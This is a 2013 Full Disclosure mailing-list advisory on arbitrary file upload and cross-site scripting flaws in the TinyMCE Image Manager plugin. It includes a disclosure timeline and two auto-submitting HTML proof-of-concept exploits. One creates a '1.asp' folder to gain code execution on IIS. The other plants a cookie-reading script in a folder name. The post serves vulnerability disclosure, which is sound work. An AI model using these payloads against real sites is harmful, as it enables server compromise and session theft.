Full Disclosure mailing list archives
AFU and XSS vulnerabilities in TinyMCE Image Manager
From: "MustLive" <mustlive () websecurity com ua>
Date: Fri, 19 Jul 2013 20:29:16 +0300
Hello list!These are Arbitrary File Uploading and Cross-Site Scripting vulnerabilities in TinyMCE Image Manager plugin for TinyMCE.
------------------------- Affected products: ------------------------- Vulnerable are TinyMCE Image Manager 1.1 and previous versions. ------------------------- Affected vendors: ------------------------- Dustweb http://dustweb.ru/projects/tinymce_images/ ---------- Details: ---------- Arbitrary File Uploading (WASC-31):The attack is possible via "1.asp" in folder name. This is bypass method for executing arbitrary code at IIS web server.
TinyMCE Image Manager AFU.html <html> <head><title>TinyMCE Image Manager Arbitrary File Uploading exploit (C) 2013 MustLive. http://websecurity.com.ua</title>
</head> <body onLoad="document.hack.submit()"><form name="hack" action="http://site/tiny_mce/plugins/images/connector/php/" method="post">
<input type="hidden" name="action" value="newfolder"> <input type="hidden" name="type" value="images"> <input type="hidden" name="path" value=""> <input type="hidden" name="name" value="1.asp"> </form> </body> </html> Cross-Site Scripting (WASC-08):This is persistent XSS on Linux/Unix and reflected XSS on Windows. The code will execute just after sending request for creating a folder and later on at requests to connector (at any operations, except creating a folder with existent name).
TinyMCE Image Manager XSS.html <html> <head><title>TinyMCE Image Manager XSS exploit (C) 2013 MustLive. http://websecurity.com.ua</title>
</head> <body onLoad="document.hack.submit()"><form name="hack" action="http://site/tiny_mce/plugins/images/connector/php/" method="post">
<input type="hidden" name="action" value="newfolder"> <input type="hidden" name="type" value="images"> <input type="hidden" name="path" value=""><input type="hidden" name="name" value="<body onload=alert(document.cookie)>">
</form> </body> </html> ------------ Timeline:------------
2013.05.22 - announced at my site. 2013.05.23 - informed developer. 2013.07.18 - disclosed at my site (http://websecurity.com.ua/6527/). Best wishes & regards, MustLive Administrator of Websecurity web sitehttp://websecurity.com.ua
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- AFU and XSS vulnerabilities in TinyMCE Image Manager MustLive (Jul 19)